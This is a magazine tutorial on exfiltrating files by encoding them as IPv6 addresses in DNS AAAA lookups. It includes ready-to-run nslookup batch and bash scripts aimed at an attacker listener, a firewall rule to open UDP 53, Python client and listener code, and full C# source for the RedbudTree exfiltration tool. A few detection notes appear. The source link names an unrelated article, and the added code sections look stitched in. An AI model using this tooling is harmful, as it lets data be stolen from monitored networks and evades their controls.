Exfiltration and Uploading DATA by DNS Traffic (AAAA Records) | By Damon Mohammadbagher


Understanding this method

In this chapter I explain how to send data to an attacker-controlled server inside DNS AAAA queries, using IPv6 addresses as the carrier. It is one more way to exfiltrate data over DNS.

Again, Why DNS protocol?

Because in many networks DNS traffic is allowed out with little or no inspection by IDS/IPS or firewalls. This article shows one way to exfiltrate data in DNS requests, in this case in “AAAA record” queries.

How can you do this?

First, take this payload, a small piece of text, as the example:

this is my test for reading File (Bytes) and Making IPV6 AAAA Requests so let me test it ;) by RedBudTree !@#$%^

In this technique the IPv6 address itself is the payload: every 16-byte chunk of the data is written as an IPv6 address and handed to nslookup as the name to look up, so all that appears on the wire is a series of AAAA queries to the attacker's server.

Note: the 128 bits are carried inside the DNS query, not in an IPv6 packet. nslookup converts an address literal into its reverse-lookup name under ip6.arpa (32 one-nibble labels), and that name goes out as the question of an ordinary AAAA query over IPv4 UDP/53. Firewalls and AV that look only at ports and protocols see plain DNS, which is why the method is hard for them to spot; anything that logs DNS query names, however, sees AAAA lookups for ip6.arpa names, which no legitimate client makes.

So how do we pack those bits into 16-byte IPv6 addresses?

STEP 1: convert the text to bytes and split them into 128-bit (16-byte) chunks:

16 bytes of text == convert to bytes ==> 16 bytes
"this is my test " == convert to 16 bytes (128 bits) ==> 74 68 69 73 20 69 73 20 6d 79 20 74 65 73 74 20

Character by character:

 t  h  i  s     i  s     m  y     t  e  s  t
74 68 69 73 20 69 73 20 6d 79 20 74 65 73 74 20

"t" = 74, "h" = 68, "i" = 69, "s" = 73, " " = 20, "i" = 69, "s" = 73, ...

So this step is simply:

128 bits (16 bytes) of text (DATA) == convert text to bytes ==> 128 bits (16 bytes) of hex (DATA)

"this is my test "  ==> 74686973206973206d79207465737420
"for reading File"  ==> 666f722072656164696e672046696c65
" (Bytes) and Mak"  ==> 202842797465732920616e64204d616b
"ing IPV6 AAAA Re"  ==> 696e6720495056362041414141205265
"quests\r\nso let m" ==> 7175657374730d0a736f206c6574206d   (the file has a CRLF line break after "Requests", hence 0d0a)
"e test it ;) by "  ==> 652074657374206974203b2920627920
"RedBudTree !@#$%"  ==> 52656442756454726565202140232425
"^ "                ==> 5e200000000000000000000000000000   (only 2 bytes are left, zero-padded to 16)

STEP 2: put the bytes into IPv6 addresses and send them with nslookup as DNS AAAA queries:

Now we need to turn those bytes into IPv6 addresses and get them to the attacker's DNS server as AAAA queries. nslookup can do both: give it the address as the name to resolve, force the query type to AAAA, and name the attacker's server as the resolver.

Note: the attacker's DNS server (listener) has the IPv4 address 192.168.56.101.

128 bits (DATA) == back to text ==> Text (DATA)

Each chunk is written as an IPv6 address (eight groups of four hex digits) and sent with one nslookup AAAA query to the attacker's DNS server:

  1. Text1: 74686973206973206d79207465737420 ==> "this is my test "
     nslookup -type=aaaa 7468:6973:2069:7320:6d79:2074:6573:7420 192.168.56.101 | find ""
  2. Text2: 666f722072656164696e672046696c65 ==> "for reading File"
     nslookup -type=aaaa 666f:7220:7265:6164:696e:6720:4669:6c65 192.168.56.101 | find ""
  3. Text3: 202842797465732920616e64204d616b ==> " (Bytes) and Mak"
     nslookup -type=aaaa 2028:4279:7465:7329:2061:6e64:204d:616b 192.168.56.101 | find ""
  4. Text4: 696e6720495056362041414141205265 ==> "ing IPV6 AAAA Re"
     nslookup -type=aaaa 696e:6720:4950:5636:2041:4141:4120:5265 192.168.56.101 | find ""
  5. Text5: 7175657374730d0a736f206c6574206d ==> "quests\r\nso let m"
     nslookup -type=aaaa 7175:6573:7473:0d0a:736f:206c:6574:206d 192.168.56.101 | find ""
  6. Text6: 652074657374206974203b2920627920 ==> "e test it ;) by "
     nslookup -type=aaaa 6520:7465:7374:2069:7420:3b29:2062:7920 192.168.56.101 | find ""
  7. Text7: 52656442756454726565202140232425 ==> "RedBudTree !@#$%"
     nslookup -type=aaaa 5265:6442:7564:5472:6565:2021:4023:2425 192.168.56.101 | find ""
  8. Text8: 5e200000000000000000000000000000 ==> "^ " (zero-padded to 16 bytes)
     nslookup -type=aaaa 5e20:0:0:0:0:0:0:0 192.168.56.101 | find ""

So, to upload (exfiltrate) the whole text “this is my test for reading File (Bytes) and Making IPV6 AAAA Requests so let me test it ;) by RedBudTree !@#$%^ ” to the attacker's DNS server at 192.168.56.101 over DNS AAAA queries, we need the eight nslookup commands collected in the “Dns.bat” file (the trailing “| find ""” only hides nslookup's local output; it does not change the query):

Dns.bat file :

nslookup -type=aaaa  7468:6973:2069:7320:6d79:2074:6573:7420 192.168.56.101 | find ""

nslookup -type=aaaa  666f:7220:7265:6164:696e:6720:4669:6c65 192.168.56.101 | find ""

nslookup -type=aaaa  2028:4279:7465:7329:2061:6e64:204d:616b 192.168.56.101 | find ""

nslookup -type=aaaa  696e:6720:4950:5636:2041:4141:4120:5265 192.168.56.101 | find ""

nslookup -type=aaaa  7175:6573:7473:0d0a:736f:206c:6574:206d 192.168.56.101 | find ""

nslookup -type=aaaa  6520:7465:7374:2069:7420:3b29:2062:7920 192.168.56.101 | find ""

nslookup -type=aaaa  5265:6442:7564:5472:6565:2021:4023:2425 192.168.56.101 | find ""

nslookup -type=aaaa  5e20:0:0:0:0:0:0:0 192.168.56.101 | find ""

Or, from a Linux client, as a bash script:

#!/bin/bash
# grep "" matches every line, so nslookup's "can't find" output is simply
# passed through; the queries themselves are unaffected (> /dev/null works too).
nslookup -type=aaaa 7468:6973:2069:7320:6d79:2074:6573:7420 192.168.56.101 | grep ""
nslookup -type=aaaa 666f:7220:7265:6164:696e:6720:4669:6c65 192.168.56.101 | grep ""
nslookup -type=aaaa 2028:4279:7465:7329:2061:6e64:204d:616b 192.168.56.101 | grep ""
nslookup -type=aaaa 696e:6720:4950:5636:2041:4141:4120:5265 192.168.56.101 | grep ""
nslookup -type=aaaa 7175:6573:7473:0d0a:736f:206c:6574:206d 192.168.56.101 | grep ""
nslookup -type=aaaa 6520:7465:7374:2069:7420:3b29:2062:7920 192.168.56.101 | grep ""
nslookup -type=aaaa 5265:6442:7564:5472:6565:2021:4023:2425 192.168.56.101 | grep ""
nslookup -type=aaaa 5e20:0:0:0:0:0:0:0 192.168.56.101 | grep ""

Note: RedbudTree.exe prints the commands with the Windows “find” filter; to run them from a Linux client (Step 5: Client Side), change “find” to “grep” by hand, as in the bash script above. The client can then be a Linux box while the attacker side runs “Listening Mode” on Windows; “Picture 3” shows that combination.
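Steps 1 and 2 above in one piece of code, including the zero padding of the last chunk that the tool leaves to the operator, as an added Python example (not code from the article or from RedbudTree; the listener address 192.168.56.101 and the test sentence are the article's, the payload bytes are constructed here with the CRLF the original file contained). It also prints the ip6.arpa name that nslookup really puts on the wire for an address literal:

```python
"""Client side of the AAAA-record channel: bytes -> IPv6 literals -> nslookup lines.

Added example, not part of the original article or the RedbudTree tool.
Assumptions: the listener address is the article's 192.168.56.101; the sample
payload is the article's test sentence, constructed here byte for byte.
"""

# Constructed from the article's example; the real file had a CRLF after "Requests".
SAMPLE = (b"this is my test for reading File (Bytes) and Making IPV6 AAAA Requests\r\n"
          b"so let me test it ;) by RedBudTree !@#$%^ ")
LISTENER = "192.168.56.101"  # attacker-side UDP/53 listener from the article


def chunk16(data: bytes) -> list:
    """Split data into 16-byte chunks; the last chunk is zero-padded so every
    chunk is exactly 128 bits (RedbudTree prints the short one as-is)."""
    chunks = [data[i:i + 16] for i in range(0, len(data), 16)]
    if chunks and len(chunks[-1]) < 16:
        chunks[-1] = chunks[-1].ljust(16, b"\x00")
    return chunks


def to_ipv6(chunk: bytes) -> str:
    """Render 16 bytes as eight 4-hex-digit groups, e.g. 7468:6973:...:7420."""
    assert len(chunk) == 16
    return ":".join(chunk[i:i + 2].hex() for i in range(0, 16, 2))


def from_ipv6(ipv6: str) -> bytes:
    """Inverse of to_ipv6; strips the zero padding (fine for text, not for
    binary data that legitimately ends in NUL bytes)."""
    return bytes.fromhex(ipv6.replace(":", "")).rstrip(b"\x00")


def reverse_name(ipv6: str) -> str:
    """The name nslookup really sends for an address literal: every nibble
    reversed and dotted under ip6.arpa (32 one-character labels)."""
    nibbles = ipv6.replace(":", "")
    return ".".join(reversed(nibbles)) + ".ip6.arpa"


def nslookup_commands(data: bytes, server: str = LISTENER, windows: bool = True) -> list:
    """One nslookup AAAA query per 16-byte chunk. 'find ""' (Windows) and
    'grep ""' (Linux) only affect what nslookup prints locally."""
    tail = 'find ""' if windows else 'grep ""'
    return [f"nslookup -type=aaaa {to_ipv6(c)} {server} | {tail}" for c in chunk16(data)]


if __name__ == "__main__":
    for line in nslookup_commands(SAMPLE):
        print(line)
    print("# first query name on the wire:", reverse_name(to_ipv6(chunk16(SAMPLE)[0])))
```

The last command comes out as 5e20:0000:0000:0000:0000:0000:0000:0000, which is the same address as the article's hand-written 5e20:0:0:0:0:0:0:0. Pass windows=False to get the grep form for a Linux client.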

On the attacker side the bytes can be recovered very simply by watching the DNS log files or the incoming AAAA queries. A real DNS server is not even needed: listening on UDP port 53 of 192.168.56.101 is enough, and that is what I did. The C# tool “RedbudTree.cs” does both halves: it generates the nslookup commands for a text or a file (the upload side) and, started with no arguments, runs a “Listening Mode” on UDP port 53 that parses each AAAA query and dumps the bytes (the attacker side).

Note: I will not walk through the C# code line by line in this article; instead I show how to use the tool.
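The receiving side, as an added Python example rather than the tool's C# code: it parses the DNS query wire format (12-byte header, length-prefixed labels, QTYPE), recognises the reverse ip6.arpa name nslookup generates, restores the nibble order and rebuilds the 16 bytes. Because the same parse tells a defender what to alert on, it also returns a verdict: an AAAA query for an ip6.arpa name is nonsense DNS (reverse names carry PTR records), and a reverse name whose nibbles decode to printable text is not an address anyone has. The packet builder and the sample names are constructed test input; listen() is the part to run on the attacker host and needs UDP/53 free (plus the firewall rule from Step 3 on Windows).

```python
"""Attacker/defender side of the AAAA-record channel. Added example, not
RedbudTree's C# code. build_query() only exists to construct test packets of
the shape nslookup sends; listen() mirrors the tool's Listening Mode."""
import socket
import struct

QTYPE_AAAA = 28
QTYPE_PTR = 12


def build_query(name: str, qtype: int, txid: int = 0x1234) -> bytes:
    """Constructed test input: minimal DNS query, RFC 1035 header + one question."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)  # RD set, QDCOUNT=1
    qname = b"".join(bytes([len(label)]) + label.encode() for label in name.split("."))
    return header + qname + b"\x00" + struct.pack("!HH", qtype, 1)


def parse_question(pkt: bytes):
    """Return (qname, qtype) of a single-question query, or None if malformed.
    Name compression never occurs in the question section, so it is rejected."""
    if len(pkt) < 12 or struct.unpack("!H", pkt[4:6])[0] != 1:
        return None
    labels, pos = [], 12
    while pos < len(pkt):
        n = pkt[pos]
        pos += 1
        if n == 0:
            break
        if n & 0xC0 or pos + n > len(pkt):
            return None
        labels.append(pkt[pos:pos + n].decode("ascii", "replace"))
        pos += n
    else:
        return None  # ran off the packet without a terminating zero label
    if pos + 4 > len(pkt):
        return None
    qtype = struct.unpack("!H", pkt[pos:pos + 2])[0]
    return ".".join(labels), qtype


def ip6_arpa_to_bytes(qname: str):
    """'0.2.4.7. ... .8.6.4.7.ip6.arpa' -> the 16 address bytes, else None."""
    labels = qname.lower().split(".")
    if labels[-2:] != ["ip6", "arpa"] or len(labels) != 34:
        return None
    nibbles = "".join(reversed(labels[:-2]))  # undo nslookup's nibble reversal
    try:
        return bytes.fromhex(nibbles)
    except ValueError:
        return None


def decode_query(pkt: bytes):
    """What the listener reports per packet: recovered bytes plus a verdict.
    Returns None for anything that is not an ip6.arpa question (for example
    the PTR query nslookup first sends for the server's own IPv4 address)."""
    q = parse_question(pkt)
    if q is None:
        return None
    qname, qtype = q
    raw = ip6_arpa_to_bytes(qname)
    if raw is None:
        return None
    printable = sum(32 <= b < 127 or b in (9, 10, 13) for b in raw) / 16
    # AAAA for a reverse name is never legitimate; a text-looking "address" is not either.
    suspicious = qtype == QTYPE_AAAA or printable >= 0.9
    return {"qname": qname, "qtype": qtype, "bytes": raw,
            "text": raw.rstrip(b"\x00").decode("ascii", "replace"),
            "suspicious": suspicious}


def listen(bind_addr: str = "0.0.0.0", port: int = 53):
    """Run on the attacker host; no DNS server needed, only a free UDP/53."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.bind((bind_addr, port))
        while True:
            pkt, peer = s.recvfrom(512)
            hit = decode_query(pkt)
            if hit:
                print(f"{peer[0]} {hit['qname']} -> {hit['bytes'].hex()} {hit['text']!r}")


if __name__ == "__main__":
    listen()
```

The same decode_query() run over a resolver's query log (reconstructing the question from the logged name and type) gives a detection rule: alert on any ip6.arpa question with qtype AAAA, or whose decoded bytes are mostly printable.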

Using RedbudTree.exe tool – step by step :

Step 1: compile the C# source with csc.exe, which ships with the .NET Framework (under %WINDIR%\Microsoft.NET\Framework\<version>\). Administrator rights are not needed to compile; they are needed later for the firewall rule:

  • c:\> csc.exe /out:RedbudTree.exe  RedbudTree.cs

Step 2 (Client Side): generate the nslookup commands for the file you want to exfiltrate with “RedbudTree.exe”, using the AAAA and FILE switches:

  • Syntax: RedbudTree.exe aaaa file File-Name.txt
  • Example: RedbudTree.exe aaaa file Test.txt

As you can see in “Picture 1”, I made a text file “Test.txt” and generated the nslookup commands that send it over DNS AAAA queries with “RedbudTree.exe AAAA FILE TEST.TXT”.

So my output was something like these commands:

nslookup -type=aaaa  7468:6973:2069:7320:6d79:2074:6573:7420 192.168.56.101 | find ""

nslookup -type=aaaa  666f:7220:7265:6164:696e:6720:4669:6c65 192.168.56.101 | find ""

nslookup -type=aaaa  2028:4279:7465:7329:2061:6e64:204d:616b 192.168.56.101 | find ""

nslookup -type=aaaa  696e:6720:4950:5636:2041:4141:4120:5265 192.168.56.101 | find ""

nslookup -type=aaaa  7175:6573:7473:0d0a:736f:206c:6574:206d 192.168.56.101 | find ""

nslookup -type=aaaa  6520:7465:7374:2069:7420:3b29:2062:7920 192.168.56.101 | find ""

nslookup -type=aaaa  5265:6442:7564:5472:6565:2021:4023:2425 192.168.56.101 | find ""

nslookup -type=aaaa  5e20

As you can see, the tool printed eight lines, and the last one was cut short:

  • nslookup -type=aaaa  5e20

That line has to be completed by hand:

  • nslookup -type=aaaa  5e20:0:0:0:0:0:0:0 192.168.56.101 | find ""

Why?

Because every IPv6 address needs all eight 16-bit groups:

IPv6        : xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx

Example :   5265:6442:7564:5472:6565:2021:4023:2425

The final chunk, “^ ”, is only two bytes, so the tool emits its first group and stops (Create_IPv6_Address does not zero-pad a partial chunk). Our address is 5e20:x:x:x:x:x:x:x, and the missing groups are filled with zeros: 5e20:0:0:0:0:0:0:0. Once the last line is fixed, copy all eight lines into one “BAT” file, for example “Demo.bat”.

Picture 1

Step 3 (Attacker Side): before starting “Listening Mode” on the attacker side, open UDP port 53 in the Windows firewall so the queries can reach the tool. The command is (RunAs Admin):

  • netsh advfirewall firewall add rule name="UDP 53" dir=in action=allow protocol=UDP localport=53

Step 4 (Attacker Side): start RedbudTree.exe with no arguments; it binds UDP port 53 and prints every AAAA query it receives (DNS Queries Listener):

  • C:\> RedbudTree.exe

Step 5 (Client Side): finally, run the nslookup commands from “Demo.bat” on the client; the data goes out as DNS AAAA queries to the attacker's listener at 192.168.56.101.

As you can see in “Picture 2”, the queries show up on the listener (UDP port 53) as soon as “Demo.bat” runs.

Picture 2

Picture 3

At a glance: IPv6 addresses make a convenient container for data exfiltration. Each 16-byte chunk becomes an address, and the AAAA lookups carry it to the attacker's (fake) DNS server. It gets past controls that only look at ports and protocols, but it is not invisible: the queries go to a resolver that is not the corporate one on UDP/53, they are AAAA lookups for ip6.arpa names, which no normal client issues, and the addresses decode to readable text. Logging DNS query names and forcing clients through an internal resolver catches it.

using System;
using System.Net;
using System.Net.Sockets;
using System.Text;

namespace RedbudTree
{
    class Program
    {
        /// <summary>
        /// RedbudTree v1.0 , IPv6 DNS Request Listener (UDP Port 53)
        /// Detecting Exfiltration DATA via IPv6 DNS AAAA Record Requests
        ///
        /// DNS IPv6 Requests tested by nslookup command in Win2008 R2 and Kali linux.
        /// RedbudTree Listener Mode tested in Win2008 R2 + .NET Framework 2.0
        ///
        /// for using "Listener Mode" UDP Port 53 should be opened before using this tool.
        /// windows command for opening UDP port 53 is :
        /// netsh advfirewall firewall add rule name="UDP 53" dir=in action=allow protocol=UDP localport=53
        ///
        /// [!] Syntax 1: Creating Exfiltration DATA via IPv6 Address and Nslookup
        /// [!] Syntax 1: RedbudTree.exe "AAAA" "Text"
        /// [!] Example1: RedbudTree.exe AAAA "this is my test"
        ///
        /// [!] Syntax 2: Creating Exfiltration DATA via IPv6 Address and Nslookup by Text Files
        /// [!] Syntax 2: RedbudTree.exe "AAAA" "FILE" "TextFile.txt"
        /// [!] Example2: RedbudTree.exe AAAA FILE "TextFile.txt"
        ///
        /// [!] Syntax 3: RedbudTree with Listening Mode
        /// [!] Syntax 3: RedbudTree.exe
        /// </summary>
        public static int counter = 0;

        // Bound only in Listening Mode (see Main), so the command generator does not
        // fail on a host where another service already owns UDP/53.
        public static UdpClient UDP_53_Init;

        public static void Async_UDP_Data_Receive(IAsyncResult AsyncResult)
        {
            IPEndPoint LocalIP_UdpPort53 = new IPEndPoint(IPAddress.Any, 53);
            byte[] UDP_Rec_Bytes;
            try
            {
                UDP_Rec_Bytes = UDP_53_Init.EndReceive(AsyncResult, ref LocalIP_UdpPort53);
            }
            catch (ObjectDisposedException)
            {
                return; // socket was closed while this receive was pending
            }
            // Re-arm at once so the next query is not lost while this one is decoded.
            UDP_53_Init.BeginReceive(Async_UDP_Data_Receive, null);

            try
            {
                Dump_IPv6_Query(UDP_Rec_Bytes);
            }
            catch (Exception omg)
            {
                Console.ForegroundColor = ConsoleColor.Gray;
                Console.WriteLine("[X] could not decode query: " + omg.Message);
            }
        }

        // Wire format of a query: 12-byte header, then the QNAME as length-prefixed labels,
        // then QTYPE and QCLASS. nslookup turns an IPv6 literal into its reverse name, 32
        // one-nibble labels under ip6.arpa, so the payload arrives as e.g.
        // "0.2.4.7. ... .8.6.4.7.ip6.arpa" with the nibbles in reverse order.
        public static void Dump_IPv6_Query(byte[] UDP_Rec_Bytes)
        {
            string UDP_DATA = Encoding.ASCII.GetString(UDP_Rec_Bytes);
            if (!UDP_DATA.ToUpper().Contains("IP6"))
            {
                return; // e.g. the PTR query nslookup sends for the server's own address
            }
            counter++;
            Console.WriteLine("[{1}] [{0}] IPv6 DNS Request Received : ", DateTime.Now.ToString(), counter.ToString());
            /// Debug Mode
            //Console.WriteLine(BitConverter.ToString(UDP_Rec_Bytes));

            Console.ForegroundColor = ConsoleColor.DarkGreen;
            Console.Write("[{0}] IPv6 DNS Bytes is :  ", DateTime.Now.ToString());
            // Keep only the label characters; the one-byte label lengths (0x01, 0x03, 0x04)
            // and the header/QTYPE/QCLASS bytes are left as '\0' in Temp.
            char[] Temp = new char[UDP_DATA.Length];
            int c = 0;
            foreach (char item in UDP_DATA)
            {
                if (Convert.ToInt32(item) > 16)
                {
                    Console.ForegroundColor = ConsoleColor.Green;
                    Console.Write(item);
                    Temp[c] = item;
                }
                else
                {
                    Console.ForegroundColor = ConsoleColor.DarkGreen;
                    Console.Write(item);
                }
                c++;
            }

            Console.WriteLine();
            Console.ForegroundColor = ConsoleColor.DarkGreen;
            Console.Write("[{0}] IPv6 DNS Request is : ", DateTime.Now.ToString());
            Console.ForegroundColor = ConsoleColor.Green;
            // Walk the packet backwards: once past the 'i' of "ip6", the labels come out in
            // their original nibble order. 75 steps back cover "arpa", "ip6" and the 32 nibble
            // labels with their length prefixes; a longer name would be cut off.
            string _Raw = "";
            bool init = false;
            int BreakTime = 0;
            for (int jj = Temp.Length - 1; jj >= 0; jj--)
            {
                if (init)
                {
                    Console.Write(Temp[jj]);
                    if (Temp[jj] != '\0') _Raw += Temp[jj];
                }
                if (Temp[jj] == 'i') init = true;
                if (BreakTime > 75) break;
                BreakTime++;
            }
            /// Debug
            //Console.WriteLine("\n" + _Raw);

            // Two hex digits per byte, never more than the 16 bytes of one address.
            byte[] RAW = new byte[16];
            int bytesToParse = Math.Min(_Raw.Length / 2, 16);
            for (int k = 0; k < bytesToParse; k++)
            {
                RAW[k] = byte.Parse(_Raw.Substring(k * 2, 2), System.Globalization.NumberStyles.HexNumber);
            }
            Console.ForegroundColor = ConsoleColor.DarkGreen;
            Console.WriteLine();
            Console.Write("[{0}] Dumping DATA from this IPv6 Address :", DateTime.Now.ToString());
            Console.ForegroundColor = ConsoleColor.Green;
            Console.Write(Encoding.ASCII.GetChars(RAW));
            Console.WriteLine();
            Console.WriteLine();
            Console.ForegroundColor = ConsoleColor.Gray;
        }

        public static void Create_IPv6_Address(string input_Exfil_String_DATA, bool _isFile)
        {
            try
            {
                string ExfiltrationText = "";
                Console.ForegroundColor = ConsoleColor.Red;
                Console.WriteLine("Your Target (UDP Port 53) Listener IPv4 Address is 192.168.56.101 you can change it manually.");
                if (_isFile)
                {
                    Console.WriteLine("Your Exfiltration Nslookup Commands for File \"{0}\" are:", input_Exfil_String_DATA);
                    // ASCII only: any byte above 0x7f becomes '?', so this is for text files.
                    byte[] FileBytes = System.IO.File.ReadAllBytes(input_Exfil_String_DATA);
                    ExfiltrationText = Encoding.ASCII.GetString(FileBytes);
                }
                else
                {
                    Console.WriteLine("Your Exfiltration Nslookup Commands are:");
                    byte[] TextBytes = Encoding.ASCII.GetBytes(input_Exfil_String_DATA);
                    ExfiltrationText = Encoding.ASCII.GetString(TextBytes);
                }
                Console.ForegroundColor = ConsoleColor.Gray;
                Console.WriteLine();

                // 16 bytes per nslookup line, printed as eight 2-byte groups separated by ':'.
                // NOTE: a final chunk shorter than 16 bytes is printed as-is and NOT zero-padded,
                // so the last line must be completed by hand (see Step 2 in the article).
                byte[] b = new byte[ExfiltrationText.Length];
                int i = 0;
                int c = 1;   // byte position within the current 16-byte chunk
                int cc = 1;  // byte position within the current 2-byte group
                Console.Write("nslookup -type=aaaa ");
                foreach (char item in ExfiltrationText)
                {
                    b[i] = Convert.ToByte(item);
                    if (cc > 2) { Console.Write(":"); cc = 1; }
                    Console.Write(string.Format("{0:x2}", b[i]));
                    if (c == 16)
                    {
                        Console.Write(" 192.168.56.101 | find \"\"");
                        Console.WriteLine();
                        Console.Write("nslookup -type=aaaa ");
                        c = 0;
                        cc = 0;
                    }
                    i++;
                    c++;
                    cc++;
                }
                Console.WriteLine();
            }
            catch (Exception omg)
            {
                Console.WriteLine(omg.Message);
            }
        }

        static void PrintHelp()
        {
            Console.WriteLine();
            Console.ForegroundColor = ConsoleColor.DarkCyan;
            Console.WriteLine("[!] Syntax 1: Creating Exfiltration DATA via IPv6 Address and Nslookup");
            Console.ForegroundColor = ConsoleColor.Cyan;
            Console.WriteLine("[!] Syntax 1: RedbudTree.exe \"AAAA\" \"Text\"");
            Console.WriteLine("[!] Example1: RedbudTree.exe AAAA \"this is my test\"");
            Console.WriteLine();
            Console.ForegroundColor = ConsoleColor.DarkCyan;
            Console.WriteLine("[!] Syntax 2: Creating Exfiltration DATA via IPv6 Address and Nslookup by Text Files");
            Console.ForegroundColor = ConsoleColor.Cyan;
            Console.WriteLine("[!] Syntax 2: RedbudTree.exe \"AAAA\" \"FILE\" \"TextFile.txt\"");
            Console.WriteLine("[!] Example2: RedbudTree.exe AAAA FILE \"TextFile.txt\"");
            Console.WriteLine();
            Console.ForegroundColor = ConsoleColor.DarkCyan;
            Console.WriteLine("[!] Syntax 3: Listening Mode");
            Console.ForegroundColor = ConsoleColor.Cyan;
            Console.WriteLine("[!] Syntax 3: RedbudTree.exe ");
            Console.WriteLine("[!] Example3: RedbudTree.exe ");
            Console.WriteLine();
            Console.ForegroundColor = ConsoleColor.Gray;
        }

        static void Main(string[] args)
        {
            /// Exfiltration and uploading DATA by Sending IPv6 DNS Request to Attacker DNS Server
            /// in this case you can Uploading DATA by IPv6 Addresses
            Console.ForegroundColor = ConsoleColor.DarkGray;
            Console.WriteLine();
            Console.WriteLine("RedbudTree , IPv6 DNS Request Listener (UDP Port 53)");
            Console.WriteLine("Detecting Exfiltration DATA via IPv6 DNS AAAA Record Requests");
            Console.ForegroundColor = ConsoleColor.Gray;
            Console.WriteLine("Published by Damon Mohammadbagher Oct-Nov 2017");
            Console.WriteLine();

            if (args.Length >= 1 && args[0].ToUpper() == "HELP")
            {
                PrintHelp();
            }
            else if (args.Length == 2 && args[0].ToUpper() == "AAAA")
            {
                Create_IPv6_Address(args[1], false);
                Console.WriteLine();
            }
            else if (args.Length == 3 && args[0].ToUpper() == "AAAA" && args[1].ToUpper() == "FILE")
            {
                Create_IPv6_Address(args[2], true);
                Console.WriteLine();
            }
            else if (args.Length == 0)
            {
                Console.ForegroundColor = ConsoleColor.Yellow;
                Console.WriteLine("[!] UDP Port 53 Listening Mode");
                Console.ForegroundColor = ConsoleColor.Gray;
                try
                {
                    UDP_53_Init = new UdpClient(53);
                    // One receive outstanding at a time; the callback re-arms itself.
                    UDP_53_Init.BeginReceive(Async_UDP_Data_Receive, null);
                }
                catch (SocketException omg)
                {
                    Console.WriteLine("[X] could not bind UDP/53 (is another DNS service running?): " + omg.Message);
                    Console.WriteLine("[!] Remember that inbound queries also need the firewall rule:");
                    Console.WriteLine("[!] netsh advfirewall firewall add rule name=\"UDP 53\" dir=in action=allow protocol=UDP localport=53");
                    return;
                }
                while (true)
                {
                    System.Threading.Thread.Sleep(1000);
                }
            }
            else
            {
                PrintHelp();
            }
        }
    }
}

Originally posted here: https://bsdmag.org/download/table-level-security-postgresql/

August 3, 2018

© HAKIN9 MEDIA SP. Z O.O. SP. K. 2013